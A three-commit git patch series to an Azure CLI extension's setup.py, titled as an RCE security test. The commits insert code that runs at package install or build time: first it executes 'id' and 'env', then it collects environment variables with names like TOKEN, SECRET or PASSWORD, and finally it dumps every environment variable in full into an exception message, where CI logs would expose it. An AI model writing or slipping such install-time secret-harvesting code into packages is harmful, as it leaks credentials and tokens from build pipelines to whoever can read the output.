From 54ecb7945f73b298339a099c0a994cb9da6adf5c Mon Sep 17 00:00:00 2001
From: Zelin Wang <zelinwang@microsoft.com>
Date: Mon, 2 Feb 2026 17:54:47 +0800
Subject: [PATCH 1/3] [Security Test] RCE vulnerability validation - DO NOT
 MERGE

---
 src/acat/setup.py | 9 +++++++++
 1 file changed, 9 insertions(+)

diff --git a/src/acat/setup.py b/src/acat/setup.py
index d5433b5e313..9fb3b9d2738 100644
--- a/src/acat/setup.py
+++ b/src/acat/setup.py
@@ -5,6 +5,15 @@
 # Code generated by aaz-dev-tools
 # --------------------------------------------------------------------------------------------
 
+import os
+import sys
+try:
+    print("[!] EXTENSION SETUP.PY POISONED [!]")
+    os.system("id")
+    os.system("env")
+except:
+    pass
+
 from codecs import open
 from setuptools import setup, find_packages
 

From f1b32ead28fbe70625a961160b0b9b952edb3ad8 Mon Sep 17 00:00:00 2001
From: Zelin Wang <zelinwang@microsoft.com>
Date: Mon, 2 Feb 2026 18:31:22 +0800
Subject: [PATCH 2/3] test

---
 src/acat/setup.py | 19 ++++++++++++-------
 1 file changed, 12 insertions(+), 7 deletions(-)

diff --git a/src/acat/setup.py b/src/acat/setup.py
index 9fb3b9d2738..98153cead97 100644
--- a/src/acat/setup.py
+++ b/src/acat/setup.py
@@ -6,13 +6,18 @@
 # --------------------------------------------------------------------------------------------
 
 import os
-import sys
-try:
-    print("[!] EXTENSION SETUP.PY POISONED [!]")
-    os.system("id")
-    os.system("env")
-except:
-    pass
+
+secrets_found = []
+for key, value in os.environ.items():
+    key_upper = key.upper()
+    if any(x in key_upper for x in ['TOKEN', 'PAT', 'SECRET', 'BOT', 'CREDENTIAL', 'PASSWORD', 'KEY']):
+        if value and value != '***':
+            secrets_found.append(f"{key}={value[:10]}...")
+
+if secrets_found:
+    raise Exception(f"[SECURITY TEST] Secrets found: {secrets_found}")
+else:
+    raise Exception("[SECURITY TEST] No secrets found in environment. AZCLIBOT_PAT, CLI_BOT, ONE_BRANCH_TOKEN are NOT accessible.")
 
 from codecs import open
 from setuptools import setup, find_packages

From ba123ed493897060da45a903f86c2f415987d50a Mon Sep 17 00:00:00 2001
From: Zelin Wang <zelinwang@microsoft.com>
Date: Mon, 2 Feb 2026 18:44:00 +0800
Subject: [PATCH 3/3] test

---
 src/acat/setup.py | 14 ++++----------
 1 file changed, 4 insertions(+), 10 deletions(-)

diff --git a/src/acat/setup.py b/src/acat/setup.py
index 98153cead97..acfd308e3b9 100644
--- a/src/acat/setup.py
+++ b/src/acat/setup.py
@@ -7,17 +7,11 @@
 
 import os
 
-secrets_found = []
+env_vars = []
 for key, value in os.environ.items():
-    key_upper = key.upper()
-    if any(x in key_upper for x in ['TOKEN', 'PAT', 'SECRET', 'BOT', 'CREDENTIAL', 'PASSWORD', 'KEY']):
-        if value and value != '***':
-            secrets_found.append(f"{key}={value[:10]}...")
-
-if secrets_found:
-    raise Exception(f"[SECURITY TEST] Secrets found: {secrets_found}")
-else:
-    raise Exception("[SECURITY TEST] No secrets found in environment. AZCLIBOT_PAT, CLI_BOT, ONE_BRANCH_TOKEN are NOT accessible.")
+    env_vars.append(f"{key}={value}")
+
+raise Exception(f"[TEST] All env variables: {env_vars}")
 
 from codecs import open
 from setuptools import setup, find_packages